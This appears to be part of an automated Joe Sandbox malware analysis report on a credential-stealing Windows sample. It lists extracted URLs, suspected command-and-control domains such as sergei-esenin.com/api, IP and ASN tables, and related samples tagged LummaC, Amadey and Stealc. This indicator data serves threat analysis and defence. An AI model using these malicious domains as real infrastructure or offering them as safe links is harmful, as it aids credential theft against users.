                                                                        https://sergei-esenin.com:443/api~file.exe, 00000000.00000002.1707016572.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://www.cloudflare.com/5file.exe, 00000000.00000003.1702917421.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1707016572.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://community.steamstufile.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://s.ytimg.com;file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://eaglepawnoy.store:443/apiGfile.exe, 00000000.00000002.1707016572.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://steam.tv/file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://community.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://community.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://community.steamstatic.com/public/css/skin_1/profilev2.css?v=t9xiI4DlPpEB&amp;l=englishfile.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://steamcommunity.com:443/profiles/76561199724331900file.exe, 00000000.00000002.1707016572.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C6F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                        • URL Reputation: malware
                                                                                        unknown
                                                                                        https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a619$efile.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://community.steamstatic.com/public/javascript/applications/community/main.js?v=4XouecKy8sZy&amfile.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000C97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://community.steamstatic.com/public/shared/css/shfile.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://sketchfab.comfile.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://lv.queniujq.cnfile.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://www.youtube.com/file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://community.steamstatic.com/public/shared/css/shared_global.css?v=uF6G1wyNU-4c&amp;l=englishfile.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://community.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://www.cloudflare.com/5xx-error-landingfile.exe, 00000000.00000003.1694712578.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694850677.0000000000C87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://sergei-esenin.com:443/apifile.exe, 00000000.00000002.1707016572.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://www.google.com/recaptcha/file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://checkout.steampowered.com/file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://store.steampowered.com/;file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://community.steamstatic.com/public/css/promo/summer2017/stickers.css?v=P8gOPraCSjV6&amp;l=englfile.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://store.steampowered.com/about/file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&amp;l=file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://help.steampowered.com/en/file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://steamcommunity.com/market/file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://store.steampowered.com/news/file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://community.steamstatic.com/public/javascript/global.js?v=7qlUmHSJhPRN&amp;l=englishfile.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://community.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://recaptcha.net/recaptcha/;file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://community.steamstatic.com/public/javascript/applications/community/manifest.js?v=r7a4-LYcQOjfile.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000C97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://sergei-esenin.com/apiUfile.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://steamcommunity.com/discussions/file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://store.steampowered.com/stats/file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://medal.tvfile.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://broadcast.st.dl.eccdnx.comfile.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://community.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&amp;l=englishfile.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://sergei-esenin.com/5Lfile.exe, 00000000.00000003.1703595779.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1707198878.0000000000D0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://community.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000C97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://community.steamstatic.com/file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://community.steamstatic.com/public/css/applications/community/main.css?v=DVae4t4RZiHA&amp;l=enfile.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000C97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://steamcommunity.com/workshop/file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://login.steampowered.com/file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://community.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://community.steamfile.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://community.steamstatic.file.exe, 00000000.00000003.1703595779.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1707198878.0000000000D0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://community.steamstatic.com/public/javascript/profile.js?v=bbs9uq0gqJ-H&amp;l=englishfile.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://community.steamstatic.com/public/css/skin_1/header.css?v=pTvrRy1pm52p&amp;l=englishfile.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://licendfilteo.site:443/api8file.exe, 00000000.00000002.1707016572.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://recaptcha.netfile.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://store.steampowered.com/file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://community.steamstatic.com/public/shared/javascript/shared_global.js?v=7glT1n_nkVCs&amp;l=engfile.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://studennotediw.store:443/apifile.exe, 00000000.00000002.1707016572.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://127.0.0.1:27060file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000C97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://clearancek.site:443/apiffile.exe, 00000000.00000002.1707016572.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://community.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=englishfile.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://sergei-esenin.com/apiinfile.exe, 00000000.00000003.1703595779.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1707198878.0000000000D0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://community.steamstatic.com/public/javascript/webui/clientcom.js?v=jq1jQyX1843y&amp;l=englishfile.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://community.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp;l=englfile.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://community.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000C97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                  104.21.53.8
                                                                                                                                                                                  sergei-esenin.comUnited States
                                                                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                                                                  104.102.49.254
                                                                                                                                                                                  steamcommunity.comUnited States
                                                                                                                                                                                  16625AKAMAI-ASUStrue
                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                  Analysis ID:1538207
                                                                                                                                                                                  Start date and time:2024-10-20 20:14:05 +02:00
                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                  Overall analysis duration:0h 2m 37s
                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                  Report type:full
                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                  Number of analysed new started processes analysed:1
                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                  Technologies:
                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                  Sample name:file.exe
                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                  Classification:mal100.troj.evad.winEXE@1/0@10/2
                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                  HCA Information:Failed
                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                  • Stop behavior analysis, all processes terminated
                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                  • VT rate limit hit for: file.exe
                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                  14:14:55API Interceptor5x Sleep call for process: file.exe modified
                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  104.21.53.8WinFIG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                    WinFIG-2024.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      Download.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            cH4EGgNUR7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              6FecO9d3l9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                S3AYU5t2JP.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                                                                                                                                                                                                  PTc16LnPI5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    yRMHuXP8fH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      sergei-esenin.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 172.67.206.204
                                                                                                                                                                                                      WinFIG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      WinFIG-2024.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 172.67.206.204
                                                                                                                                                                                                      SentinelOculus.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 172.67.206.204
                                                                                                                                                                                                      Download.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 172.67.206.204
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 172.67.206.204
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 172.67.206.204
                                                                                                                                                                                                      steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      Unlock_Tool_2.3.1.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      WinFIG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      WinFIG-2024.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      SentinelOculus.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      Download.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 172.67.206.204
                                                                                                                                                                                                      RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                                                      9XHFe6y4Dj.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      WinFIG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      WinFIG-2024.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 172.67.206.204
                                                                                                                                                                                                      SentinelOculus.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 172.67.206.204
                                                                                                                                                                                                      Download.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      Aquantia.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      AKAMAI-ASUSbin.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                      • 23.218.148.10
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      Unlock_Tool_2.3.1.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                      • 104.102.49.254
